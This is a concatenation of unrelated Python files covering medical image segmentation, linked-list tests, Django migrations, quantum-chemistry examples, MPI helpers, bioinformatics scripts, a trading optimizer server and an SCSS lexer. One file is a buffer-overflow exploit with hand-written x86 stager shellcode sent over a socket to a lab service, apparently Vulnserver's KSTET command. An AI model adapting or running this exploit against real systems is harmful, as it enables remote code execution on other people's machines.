#transform the data to channels_last keras format
test_image = test_image.swapaxes(0,1)
test_image=np.transpose(test_image,(0,2,3,1))
test_image, gt = np.array(test_image[slice_]), np.array(gt[slice_])
if model_type == 'dense':
npad = ((8, 8), (8, 8), (0, 0))
test_image = np.pad(test_image, pad_width=npad, mode='constant', constant_values=0)
npad = ((8, 8), (8, 8))
gt = np.pad(gt, pad_width=npad, mode='constant', constant_values=0)
return test_image, gt
class Test_Time_Augmentation():
def __init__(self, test_image):
# the noise scale is derived from the intensity range of the volume being augmented
self.aug = iaa.SomeOf(3, [iaa.Affine(
rotate=iap.Normal(0.0, 3),
translate_px=iap.Normal(0.0, 3)),
iaa.AdditiveGaussianNoise(scale=0.3 * np.ptp(test_image) - 9),
iaa.Noop(),
iaa.MotionBlur(k=3, angle = [-2, 2])
], random_order=True)
def predict_aleatoric(self, model, test_image, iterations=1000, dropout=0.5):
predictions = []
for i in range(iterations):
aug_image = self.aug.augment_images(test_image)
predictions.append(model.predict(aug_image))
predictions = np.array(predictions)
mean = np.mean(predictions, axis = 0)
var = np.var(predictions, axis = 0)
print(mean.shape)
plt.imshow(np.argmax(mean, axis = -1).reshape((240, 240)), vmin = 0., vmax = 3.)
plt.show()
plt.figure(figsize = (8, 8))
plt.imshow(np.mean(var[:, :, :, 1:], axis = -1).reshape((240, 240)))
plt.colorbar()
plt.show()
if __name__ == '__main__':
# model_type and slice index below are example values, not from the original script
test_image, gt = load_vol(test_path[0], 'unet', 78)
model = load_model('/home/parth/Interpretable_ML/Brain-tumor-segmentation/checkpoints/Unet_MC/UnetRes_MC.h5')
model.load_weights('/home/parth/Interpretable_ML/Brain-tumor-segmentation/checkpoints/Unet_MC/UnetRes.60_1.066.hdf5', by_name = True)
D = Test_Time_Augmentation(test_image)
D.predict_aleatoric(model, test_image, iterations = 100, dropout = 0.)
|
python
|
class Node:
def __init__(self, value):
self.value = value
self.next = None
def __repr__(self):
return str(self.value)
class LinkedList:
def __init__(self):
self.head = None
def __str__(self):
cur_head = self.head
out_string = ""
while cur_head:
out_string += str(cur_head.value) + " -> "
cur_head = cur_head.next
return out_string
def append(self, value):
if self.head is None:
self.head = Node(value)
return
node = self.head
while node.next:
node = node.next
node.next = Node(value)
def pop(self):
if self.head is None:
return None
node = self.head
self.head = self.head.next
return node
def size(self):
size = 0
node = self.head
while node:
size += 1
node = node.next
return size
def union(llist_1, llist_2):
union_set = set()
output = LinkedList()
while llist_1.head is not None:
union_set.add(llist_1.pop().value)
while llist_2.head is not None:
union_set.add(llist_2.pop().value)
for num in union_set:
output.append(num)
return output
def intersection(llist_1, llist_2):
l1_set = set()
l2_set = set()
intersection = set()
output = LinkedList()
while llist_1.head is not None:
l1_set.add(llist_1.pop().value)
while llist_2.head is not None:
l2_set.add(llist_2.pop().value)
for elem in l1_set:
if elem in l2_set:
intersection.add(elem)
for num in intersection:
output.append(num)
return output
# Union test case 1 - union exists
linked_list_1 = LinkedList()
linked_list_2 = LinkedList()
element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 21]
element_2 = [6, 32, 4, 9, 6, 1, 11, 21, 1]
solution = [1, 2, 3, 4, 6, 9, 11, 21, 32, 35, 65]
for i in element_1:
linked_list_1.append(i)
for j in element_2:
linked_list_2.append(j)
output = union(linked_list_1, linked_list_2)
output_list = []
while output.head:
output_list.append(output.pop().value)
output_list.sort()
if output_list == solution:
print("Test case 1 union: Pass!")
else:
print("Test case 1 union: FAIL.")
# Intersection test case 1 - intersection exists
linked_list_1 = LinkedList()
linked_list_2 = LinkedList()
element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 21]
element_2 = [6, 32, 4, 9, 6, 1, 11, 21, 1]
solution = [4, 6, 21]
for i in element_1:
linked_list_1.append(i)
for j in element_2:
linked_list_2.append(j)
output = intersection(linked_list_1, linked_list_2)
output_list = []
while output.head:
num = output.pop().value
output_list.append(num)
if sorted(output_list) == solution:
print("Test case 1 intersection: Pass!")
else:
print("Test case 1 intersection: FAIL.")
# Union test case 2 - union exists
linked_list_3 = LinkedList()
linked_list_4 = LinkedList()
element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 23]
element_2 = [1, 7, 8, 9, 11, 21, 1]
solution = [1, 2, 3, 4, 6, 7, 8, 9, 11, 21, 23, 35, 65]
for i in element_1:
linked_list_3.append(i)
for i in element_2:
linked_list_4.append(i)
output = union(linked_list_3, linked_list_4)
output_list = []
while output.head:
output_list.append(output.pop().value)
if sorted(output_list) == solution:
print("Test case 2 union: Pass!")
else:
print("Test case 2 union: FAIL.")
# Intersection test case 2 - intersection does not exist
linked_list_3 = LinkedList()
linked_list_4 = LinkedList()
element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 23]
element_2 = [1, 7, 8, 9, 11, 21, 1]
solution = []
for i in element_1:
linked_list_3.append(i)
for i in element_2:
linked_list_4.append(i)
output = intersection(linked_list_3, linked_list_4)
output_list = []
while output.head:
output_list.append(output.pop().value)
if sorted(output_list) == solution:
print("Test case 2 intersection: Pass!")
else:
print("Test case 2 intersection: FAIL.")
# Union test case 3 - union of empty sets
linked_list_3 = LinkedList()
linked_list_4 = LinkedList()
element_1 = []
element_2 = []
solution = []
for i in element_1:
linked_list_3.append(i)
for i in element_2:
linked_list_4.append(i)
output = union(linked_list_3, linked_list_4)
output_list = []
while output.head:
output_list.append(output.pop().value)
if sorted(output_list) == solution:
print("Test case 3 union: Pass!")
else:
print("Test case 3 union: FAIL.")
# Intersection test case 3 - intersection of empty sets
linked_list_3 = LinkedList()
linked_list_4 = LinkedList()
element_1 = []
element_2 = []
solution = []
for i in element_1:
linked_list_3.append(i)
for i in element_2:
linked_list_4.append(i)
output = intersection(linked_list_3, linked_list_4)
output_list = []
while output.head:
output_list.append(output.pop().value)
if sorted(output_list) == solution:
print("Test case 3 intersection: Pass!")
else:
print("Test case 3 intersection: FAIL.")
|
python
|
# Generated by Django 2.2.12 on 2020-07-18 19:09
import ckeditor.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0019_order_refrence_code'),
]
operations = [
migrations.AlterField(
model_name='historicalitem',
name='additional_info',
field=ckeditor.fields.RichTextField(blank=True, null=True),
),
migrations.AlterField(
model_name='historicalitem',
name='description',
field=ckeditor.fields.RichTextField(),
),
migrations.AlterField(
model_name='item',
name='additional_info',
field=ckeditor.fields.RichTextField(blank=True, null=True),
),
migrations.AlterField(
model_name='item',
name='description',
field=ckeditor.fields.RichTextField(),
),
]
|
python
|
import unittest
import math_module
class TestMath(unittest.TestCase):
def setUp(self):
self.zir = math_module.Analysis('test_zircon', 15, (0.2003, 0.0008, 0.0046), (2.082, 0.009, 0.07), 0.6, 0.6,
(0.0617, 0.0003, 0.0003), (0.758, 0.0003, 0.0015), (0, 0, 0), (0, 0, 0), (0, 0, 0),
(0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), 1)
def tearDown(self):
pass
def test_calc_ratio(self):
result = math_module.calc_ratio(1000)[0]
self.assertEqual(result, 0.16780392747297124)
def test_analysis(self):
self.assertEqual(round(self.zir.calc_age(0)[0], 0), 1177)
if __name__ == '__main__':
unittest.main()
|
python
|
PATHS = dict(
REPOS_FILE = 'config/repos.json',
DAILY_REPORTS_PATH = 'reports/daily',
WEEKLY_REPORTS_PATH = 'reports/weekly'
)
|
python
|
from django.contrib import admin
from django.utils.html import format_html
from ddweb.apps.references.models import Reference
class ReferenceAdmin(admin.ModelAdmin):
list_display = (
"ship",
"year",
"description",
"ongoing",
"beforeDD",
"image_admin_url",
)
def image_admin_url(self, obj):
# allow_tags was removed in Django 2.0; format_html keeps the link unescaped
return format_html('<a href="/images/uploadf/reference/{}">Upload images</a>', obj.id)
admin.site.register(Reference, ReferenceAdmin)
|
python
|
#!/usr/bin/env python
import numpy
import numpy.linalg
from functools import reduce  # reduce is not a builtin under Python 3
from pyscf import gto, scf, mcscf
mol = gto.M(atom=['H 0 0 %f'%i for i in range(10)], unit='Bohr',
basis='ccpvtz')
#
# A regular SCF calculation for this system will raise a warning message
#
# Warn: Singularity detected in overlap matrix (condition number = 5.47e+09). SCF may be inaccurate and hard to converge.
#
# The linear dependency can cause HF, MCSCF etc methods converging to wrong
# answer. This example shows how to remove linear dependency from overlap
# matrix and use the linearly independent basis in the HF, MCSCF calculations.
#
# There is a shortcut function to remove linear-dependency, eg
#
# mf = scf.RHF(mol).apply(scf.addons.remove_linear_dep_)
#
# This example demonstrates how the linear dependency is removed in our
# implementation.
#
#
# The smallest eigenvalue of overlap matrix is 10^{-9}
#
s = mol.intor('cint1e_ovlp_sph')
print(numpy.linalg.eigh(s)[0][:8])
#[ 1.96568587e-09 8.58358923e-08 7.86870520e-07 1.89728026e-06
# 2.14355169e-06 8.96267338e-06 2.46812168e-05 3.26534277e-05]
def eig(h, s):
d, t = numpy.linalg.eigh(s)
# Removing the eigenvectors associated with the smallest eigenvalues, the new
# basis defined by the x matrix has 139 vectors.
x = t[:,d>1e-8] / numpy.sqrt(d[d>1e-8])
xhx = reduce(numpy.dot, (x.T, h, x))
e, c = numpy.linalg.eigh(xhx)
c = numpy.dot(x, c)
# Return 139 eigenvalues and 139 eigenvectors.
return e, c
#
# Replacing the default eig function with the above one, the HF solver
# generate only 139 canonical orbitals
#
mf = scf.RHF(mol)
mf.eig = eig
mf.verbose = 4
mf.kernel()
#
# The CASSCF solver takes the HF orbital as initial guess. The MCSCF problem
# size is (0 core, 10 active, 129 external) orbitals. This information can be
# found in the output.
#
mc = mcscf.CASSCF(mf, 10, 10)
mc.verbose = 4
mc.kernel()
#
# For symmetry adapted calculation, similar treatments can be applied.
#
# Here by assigning symmetry=1, mol.irrep_name, mol.irrep_id and mol.symm_orb
# (see pyscf/gto/mole.py) are initialized in the mol object. They are the
# irrep symbols, IDs, and symmetry-adapted-basis.
#
mol = gto.M(atom=['H 0 0 %f'%i for i in range(10)], unit='Bohr',
basis='ccpvtz', symmetry=1)
#
# The smallest eigenvalue is associated to A1u irrep. Removing the relevant
# basis will not break the symmetry
#
s = mol.intor('cint1e_ovlp_sph')
for i, c in enumerate(mol.symm_orb):
s1 = reduce(numpy.dot, (c.T, s, c))
print(mol.irrep_name[i], numpy.linalg.eigh(s1)[0])
#A1g [ 8.58358928e-08 2.14355169e-06 2.46812168e-05 3.26534277e-05
#...
#E1gx [ 1.67409011e-04 2.38132838e-03 4.51022127e-03 9.89429994e-03
#...
#E1gy [ 1.67409011e-04 2.38132838e-03 4.51022127e-03 9.89429994e-03
#...
#A1u [ 1.96568605e-09 7.86870519e-07 1.89728026e-06 8.96267338e-06
#...
# pyscf/scf/hf_symm.py
def eig(h, s):
from pyscf import symm
nirrep = len(mol.symm_orb)
h = symm.symmetrize_matrix(h, mol.symm_orb)
s = symm.symmetrize_matrix(s, mol.symm_orb)
cs = []
es = []
#
# Linear dependency are removed by looping over different symmetry irreps.
#
for ir in range(nirrep):
d, t = numpy.linalg.eigh(s[ir])
x = t[:,d>1e-8] / numpy.sqrt(d[d>1e-8])
xhx = reduce(numpy.dot, (x.T, h[ir], x))
e, c = numpy.linalg.eigh(xhx)
cs.append(reduce(numpy.dot, (mol.symm_orb[ir], x, c)))
es.append(e)
e = numpy.hstack(es)
c = numpy.hstack(cs)
return e, c
mf = scf.RHF(mol)
mf.eig = eig
mf.verbose = 4
mf.kernel()
mc = mcscf.CASSCF(mf, 10, 10)
mc.verbose = 4
mc.kernel()
|
python
|
from numpy import prod
def persistence(n):
if n < 10: return 0
nums = [int(x) for x in str(n)]
steps = 1
while prod(nums) > 9:
nums = [int(x) for x in str(int(prod(nums)))]
steps += 1
return steps
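# Worked example: persistence(39) == 3, because 3*9 = 27 -> 2*7 = 14 -> 1*4 = 4.
# Single-digit inputs return 0 by definition, e.g. persistence(4) == 0.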
|
python
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import socket
from time import sleep
from struct import *
host= "172.30.200.66"
port = 9999
payload = ""
# Stage 2 -> Realign the stack to locate the file descriptor
payload += "\x54" # push esp
payload += "\x59" # pop ecx
payload += "\x66\x81\xE9\x44\x01" # sub cx,0x144
# Readjust the position of ESP
# since ESP (the stack) sits below this payload, move it to a position above it
payload += "\x83\xEC\x50" # sub esp 50
# Stage 3 -> Compute the recv() parameters
# int recv( SOCKET s, char *buf, int len, int flags );
# Push the 4th parameter (flags)
payload += "\x31\xC0" # xor eax,eax --> zero EAX
payload += "\x50" # push eax
# Push the 3rd parameter (len)
payload += "\x31\xC0" # xor eax,eax --> zero EAX
payload += "\xB0\x08" # mov al,0x8
payload += "\xB4\x02" # mov ah,0x2
payload += "\x50" # push eax --> EAX must hold the value 0x00000208 (520 decimal)
# Push the 2nd parameter (*buf), i.e. the address of the buffer
payload += "\x54" # push esp
payload += "\x5A" # pop edx
payload += "\x83\xC2\x50" # ADD EDX, 50
payload += "\x52" # push edx
# Push the 1st parameter (socket)
payload += "\xFF\x31" # PUSH DWORD PTR DS:[ECX]
payload += "\xCC" # Breakpoint
payload += "\x90" * (66 - len(payload)) # pad with NOPs
payload += pack('<L',0x625011af) # 0x625011af : jmp esp | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (essfunc.dll)
# Stage 1 -> JMP to the start of our payload (AAAA...)
payload += "\x54" # push esp
payload += "\x5A" # pop edx
payload += "\x83\xEA\x46" # sub edx,byte +0x46
payload += "\xFF\xE2" # jmp edx
buffer = b"KSTET /.:/"
buffer += payload
shellcode = "E" * 520
print "[*] Sending malicious request ... :)"
exp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exp.connect((host,port))
exp.recv(4096)
exp.send(buffer)
exp.close()
|
python
|
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
import numpy as np
################################################################################
###
### USAGE
### list_of_objects = parutil.init(list_of_object)
### ### DO WHAT YOU WANT
### list_of object = parutil.finish(list_of_objects)
###
################################################################################
def init(iterable):
iterable = scatter(iterable)
return iterable
def finish(iterable, barrier=True):
iterable = bcast(gather(iterable))
if barrier: comm.Barrier()
return iterable
def scatter(iterable):
"""Scatter iterable as chunks to the cores.
N.B.: len(iterable) == size after scattering!"""
iterable = comm.scatter(chop(iterable))
return iterable
def gather(iterable, keep_order=True, keep_type=True):
iterable = comm.gather(iterable)
if rank == 0:
itertype = type(iterable)
iterable = sum(iterable,[])
if keep_order:
natural = range(len(iterable))
mixed = chop(natural)
try:
mixed = sum(mixed,[])
except TypeError:
### list elements are generators!
mixed = [list(i) for i in mixed]
mixed = sum(mixed,[])
order = np.argsort(mixed)
iterable = np.array(iterable)[order]
if keep_type == True:
if itertype in [list, tuple, set, frozenset]:
iterable = itertype(iterable)
elif itertype is not np.ndarray:
raise NotImplementedError("NOT TESTED")
return iterable
def bcast(iterable):
iterable = comm.bcast(iterable)
return iterable
def chop(iterable):
"""Chop an iterable into (quasi)-equally long chunks.
Automatically handle non-multiplier! ( len(iterable)%size != 0 )
Core function for parallelization"""
chunks = [iterable[i::size] for i in range(size)]
return chunks
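# Worked example: with size == 4 cores, chop(list(range(10))) returns
# [[0, 4, 8], [1, 5, 9], [2, 6], [3, 7]]; gather() later undoes this
# round-robin interleaving via the argsort bookkeeping above.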
|
python
|
#!/usr/bin/env python
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--input", type=str, help="database file input")
parser.add_argument("-o", "--output", type=str, help="filtered fasta output")
parser.add_argument("-k", "--keyword", type=str, help="filter records to include keyword")
args = parser.parse_args()
rec_dict = {}
with open(args.input, "r") as ifile:
line = ifile.readline()
while line != "":
header = line
line = ifile.readline()
seq = ""
while line != "" and line[0] != ">":
seq += line.strip()
line = ifile.readline()
rec_dict[header] = seq
with open(args.output, "w") as ofile:
for rec in rec_dict.keys():
if args.keyword in rec:
ofile.write(F"{rec}{rec_dict[rec]}\n")
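# Usage sketch (hypothetical script and file names):
#   python filter_fasta.py -i proteins.fasta -o kinases.fasta -k kinase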
|
python
|
# PyAlgoTrade
#
# Copyright 2011-2018 Gabriel Martin Becedillas Ruiz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Gabriel Martin Becedillas Ruiz <[email protected]>
"""
import threading
import time
from six.moves import xmlrpc_server
import pyalgotrade.logger
from pyalgotrade.optimizer import base
from pyalgotrade.optimizer import serialization
logger = pyalgotrade.logger.getLogger(__name__)
class AutoStopThread(threading.Thread):
def __init__(self, server):
super(AutoStopThread, self).__init__()
self.__server = server
def run(self):
while self.__server.jobsPending():
time.sleep(1)
self.__server.stop()
class Job(object):
def __init__(self, strategyParameters):
self.__strategyParameters = strategyParameters
self.__bestResult = None
self.__bestParameters = None
self.__id = id(self)
def getId(self):
return self.__id
def getNextParameters(self):
ret = None
if len(self.__strategyParameters):
ret = self.__strategyParameters.pop()
return ret
# Restrict to a particular path.
class RequestHandler(xmlrpc_server.SimpleXMLRPCRequestHandler):
rpc_paths = ('/PyAlgoTradeRPC',)
class Server(xmlrpc_server.SimpleXMLRPCServer):
def __init__(self, paramSource, resultSinc, barFeed, address, port, autoStop=True, batchSize=200):
assert batchSize > 0, "Invalid batch size"
xmlrpc_server.SimpleXMLRPCServer.__init__(
self, (address, port), requestHandler=RequestHandler, logRequests=False, allow_none=True
)
# super(Server, self).__init__(
# (address, port), requestHandler=RequestHandler, logRequests=False, allow_none=True
# )
self.__batchSize = batchSize
self.__paramSource = paramSource
self.__resultSinc = resultSinc
self.__barFeed = barFeed
self.__instrumentsAndBars = None # Serialized instruments and bars for faster retrieval.
self.__barsFreq = None
self.__activeJobs = {}
self.__lock = threading.Lock()
self.__startedServingEvent = threading.Event()
self.__forcedStop = False
self.__bestResult = None
if autoStop:
self.__autoStopThread = AutoStopThread(self)
else:
self.__autoStopThread = None
self.register_introspection_functions()
self.register_function(self.getInstrumentsAndBars, 'getInstrumentsAndBars')
self.register_function(self.getBarsFrequency, 'getBarsFrequency')
self.register_function(self.getNextJob, 'getNextJob')
self.register_function(self.pushJobResults, 'pushJobResults')
def getInstrumentsAndBars(self):
return self.__instrumentsAndBars
def getBarsFrequency(self):
return str(self.__barsFreq)
def getNextJob(self):
ret = None
with self.__lock:
# Get the next set of parameters.
params = [p.args for p in self.__paramSource.getNext(self.__batchSize)]
# Map the active job
if len(params):
ret = Job(params)
self.__activeJobs[ret.getId()] = ret
return serialization.dumps(ret)
def jobsPending(self):
if self.__forcedStop:
return False
with self.__lock:
jobsPending = not self.__paramSource.eof()
activeJobs = len(self.__activeJobs) > 0
return jobsPending or activeJobs
def pushJobResults(self, jobId, result, parameters, workerName):
jobId = serialization.loads(jobId)
result = serialization.loads(result)
parameters = serialization.loads(parameters)
# Remove the job mapping.
with self.__lock:
try:
del self.__activeJobs[jobId]
except KeyError:
# The job's results were already submitted.
return
if self.__bestResult is None or result > self.__bestResult:
logger.info("Best result so far %s with parameters %s" % (result, parameters))
self.__bestResult = result
self.__resultSinc.push(result, base.Parameters(*parameters))
def waitServing(self, timeout=None):
return self.__startedServingEvent.wait(timeout)
def stop(self):
self.shutdown()
def serve(self):
assert len(self.__barFeed.getAllFrequencies()) == 1
try:
# Initialize instruments, bars and parameters.
logger.info("Loading bars")
loadedBars = []
for dateTime, bars, freq in self.__barFeed:
loadedBars.append(bars)
instruments = self.__barFeed.getRegisteredInstruments()
self.__instrumentsAndBars = serialization.dumps((instruments, loadedBars))
self.__barsFreq = self.__barFeed.getAllFrequencies()[0]
if self.__autoStopThread:
self.__autoStopThread.start()
logger.info("Started serving")
self.__startedServingEvent.set()
self.serve_forever()
logger.info("Finished serving")
if self.__autoStopThread:
self.__autoStopThread.join()
finally:
self.__forcedStop = True
|
python
|
"""
Custom SCSS lexer
~~~~~~~~~~~~~~~~~
This is an alternative to the Pygments SCSS lexer
which is broken.
Note, this SCSS lexer is also broken, but just a bit less
broken.
"""
import re
from pygments.lexer import ExtendedRegexLexer
from pygments.lexers.css import (
bygroups, copy, Comment, default, include, iteritems, Keyword,
Name, Operator, Punctuation, String, Text)
from pygments.lexers.css import ScssLexer as DefaultScssLexer
class ScssLexer(ExtendedRegexLexer):
"""
For SCSS stylesheets.
"""
name = 'SCSS2'
aliases = ['scss2']
filenames = ['*.scss']
mimetypes = ['text/x-scss']
flags = re.IGNORECASE | re.DOTALL
def selector_callback(self, match, ctx):
ctx.pos = match.start()
stack = ctx.stack
ctx.stack = ['selector']
analyses = []
try:
for pos, token, text in self.get_tokens_unprocessed(context=ctx):
analyses.append((pos, token, text))
except IndexError:
pass
text = ''.join(analysis[-1] for analysis in analyses).strip()
if text and text[-1] in ';}':
analyses = []
ctx.pos = match.start()
ctx.stack = ['attribute']
try:
for pos, token, text in self.get_tokens_unprocessed(context=ctx):
analyses.append((pos, token, text))
except IndexError:
pass
for pos, token, text in analyses:
yield pos, token, text
ctx.stack = stack
ctx.pos = pos + len(text)
tokens = {}
for group, common in iteritems(DefaultScssLexer.tokens):
tokens[group] = copy.copy(common)
tokens['root'] = [
(r'\s+', Text),
(r'//.*?\n', Comment.Single),
(r'/\*.*?\*/', Comment.Multiline),
(r'@import', Keyword, 'value'),
(r'@for', Keyword, 'for'),
(r'@if', Keyword, 'condition'),
(r'@while', Keyword, 'condition'),
(r'@else', Keyword),
(r'@(debug|warn|if|while)', Keyword, 'value'),
(r'(@mixin)( [\w-]+)', bygroups(Keyword, Name.Function), 'value'),
(r'(@include)( [\w-]+)', bygroups(Keyword, Name.Decorator), 'value'),
(r'@extend', Keyword, 'selector'),
(r'(@media)(\s+)', bygroups(Keyword, Text), 'value'),
(r'@[\w-]+', Keyword, 'selector'),
(r'(\$[\w-]*\w)([ \t]*:)', bygroups(Name.Variable, Operator), 'value'),
(r'[{}]', Punctuation),
(r'[\w\.#]', selector_callback),
]
tokens['selector'] = [
(r'[ \t]+', Text),
(r'\:', Name.Decorator, 'pseudo-class'),
(r'\.', Name.Class, 'class'),
(r'#\{', String.Interpol, 'interpolation'),
(r'\#', Name.Namespace, 'id'),
(r'[\w-]+', Name.Tag),
(r'[~^*!&\[\]()<>|+=@:./?-]', Operator),
(r'"', String.Double, 'string-double'),
(r"'", String.Single, 'string-single'),
(r'[,{;]', Punctuation, '#pop')
]
tokens['attribute'] = [
(r'\s+', Text),
(r'[\w-]+', Name.Attribute),
(r'#\{', String.Interpol, 'interpolation'),
(r'[:]', Operator, 'value'),
(r'\}', Punctuation, '#pop')
]
tokens['condition'] = [
(r'[!%()<>+=-]', Operator),
include('value'),
default('#pop')]
tokens['else'] = [('if', Keyword, 'condition'), default('#pop')]
tokens['value'].append((r'\$[\w-]', Name.Variable))
tokens['value'].append((r'}', Punctuation, '#pop'))
tokens['pseudo-class'] = [
(r'[\w-]+', Name.Decorator),
(r'#\{', String.Interpol, 'interpolation'),
include('value'),
default('#pop'),
]
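# Minimal usage sketch (not part of the original module): highlight a small SCSS
# snippet with the lexer above. TerminalFormatter is only an illustrative formatter
# choice, and given the module's own caveat the token stream may still be imperfect.
if __name__ == '__main__':
    from pygments import highlight
    from pygments.formatters import TerminalFormatter
    sample = '.card { color: $accent; }'
    print(highlight(sample, ScssLexer(), TerminalFormatter()))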
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Create a fastq file from fasta file with fake quality values all equal.
"""
import sys
from Bio import SeqIO
# Get inputs
fa_path = sys.argv[1]
fq_path = sys.argv[2]
# Make fastq
with open(fa_path, "rb") as fasta, open(fq_path, "wb") as fastq:
for record in SeqIO.parse(fasta, "fasta"):
record.letter_annotations["phred_quality"] = [40] * len(record)
SeqIO.write(record, fastq, "fastq")
|
python
|
from Common import *
import os
photos = set()
async def save_photo(photo):
id = photo.id
if id not in photos:
await bot.download_media(photo, get_path(id))
photos.add(id)
return get_path(id)
def rename_to_id(name, id):
os.rename(get_path(name), get_path(id))
photos.add(id)
def get_id(path):
return os.path.splitext(os.path.basename(path))[0]
def get_path(name):
name = str(name)
if name.startswith(os.path.join('tmp', '')):
return name
return os.path.join('tmp', name + '.jpg')
def clear_tmp():
photos.clear()
for filename in os.listdir('tmp'):
os.remove(os.path.join('tmp', filename))
def fix_tmp():
if not os.path.exists('tmp'):
os.mkdir('tmp')
if len(os.listdir('tmp')) > 200:
clear_tmp()
|
python
|
from beem import Steem
stm = Steem()
print(stm.get_config(1)["STEEMIT_MAX_PERMLINK_LENGTH"])
print(stm.get_config()["STEEMIT_MIN_PERMLINK_LENGTH"])
|
python
|
from io import BytesIO
from http.server import HTTPServer, SimpleHTTPRequestHandler, BaseHTTPRequestHandler
from zipreport.cli.debug.server import DebugServer
class DebugServerHandler(BaseHTTPRequestHandler):
def __init__(self, *args, report=None, **kwargs):
self._report = report
super().__init__(*args, **kwargs)
def do_GET(self):
self.send_response(200)
self.end_headers()
print(self.path)
print("Received:", self.command, self.path)
self.wfile.write(b'Hello, world!')
def do_POST(self):
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
self.send_response(200)
self.end_headers()
response = BytesIO()
response.write(b'This is POST request. ')
response.write(b'Received: ')
response.write(body)
self.wfile.write(response.getvalue())
#server_address = ('', 8000)
#httpd = HTTPServer(server_address, DebugServerHandler)
#httpd.report = "tadaa"
#httpd.serve_forever()
server = DebugServer()
server.run('./examples/reports/newsletter')
|
python
|
# Generated by Django 3.2.7 on 2021-11-23 16:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('blog', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.AddField(
model_name='comment',
name='user_comment',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_comment', to=settings.AUTH_USER_MODEL, verbose_name='User'),
),
migrations.AddField(
model_name='blog',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.category', verbose_name='Category'),
),
]
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Copyright (c) 2021 Scott Weaver
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""
Calculate the distance between two concentric ellipses, one of which has been rotated.
"""
import os
import sys
import math
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import gridspec
# ----------
# Default values
# a is the radius along the x-axis (sometimes shown as h)
# b is the radius along the y-axis (sometimes shown as v)
# first (the outside) ellipse
a1=6.5
b1=6.0
# second (inner) rotated ellipse
a2=6.0
b2=5.0
# angles
T=20 # inner ellipse rotation angle
lT=T # line of intersection angle
# ----------
# check for obvious issues
def check_for_issues():
if T == 90 and a2 == b1:
sys.stderr.write("WARNING: " +
"The horizontal and vertical radii are equal and " +
"will result in a divide by zero runtime error." + os.linesep)
# ----------
# Calculate y for a line passing through x at an angle t.
# This is for a line passing through the origin (0, 0).
# The angle t is in degrees.
def get_position_y_at_angle(x, t):
trad = math.radians(t)
return math.tan(trad)*x
def get_position_x_at_angle(y, t):
trad = math.radians(t)
return y / math.tan(trad)
# ----------
# rational representation: https://en.wikipedia.org/wiki/Ellipse
# This method was used just for fun.
# a: horizontal radius
def get_ellipse_x_rational(u, a):
x = a * (1 - u**2) / (u**2 + 1)
return x
# b: vertical radius
def get_ellipse_y_rational(u, b):
y = (2*b*u) / (u**2 + 1)
return y
# ----------
# Standard parametric representation: https://en.wikipedia.org/wiki/Ellipse
def get_ellipse_x_standard(t, a):
return a * (math.cos(math.radians(t)))
def get_ellipse_y_standard(t, b):
return b * (math.sin(math.radians(t)))
# ----------
# rotate ellipse
def get_ellipse_x_rotated(t, a, b, r):
trad = math.radians(t)
rrad = math.radians(r)
x = (a * math.cos(trad) * math.cos(rrad)) - (b * math.sin(trad) * math.sin(rrad))
return x
def get_ellipse_y_rotated(t, a, b, r):
trad = math.radians(t)
rrad = math.radians(r)
y = (a * math.cos(trad) * math.sin(rrad)) + (b * math.sin(trad) * math.cos(rrad))
return y
# ----------
# The intersection of a line and an ellipse
def get_line_ellipse_x_intercept_standard(t, a, b):
# trad = math.radians(t)
# n=a**2 * b**2
# d=b**2 + (a**2 * math.tan(trad)**2)
# x = math.sqrt(n/d)
# # make sure we're in the right quadrant
# if lT > 90 and lT < 270:
# x*=-1
# return x
return get_line_ellipse_x_intercept_rotated(t, a, b, 0)
# ----------
# The intersection of line and rotated ellipse (at the origin)
# http://quickcalcbasic.com/ellipse%20line%20intersection.pdf
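# Substituting the line y = m*x into the rotated-ellipse equation yields a quadratic
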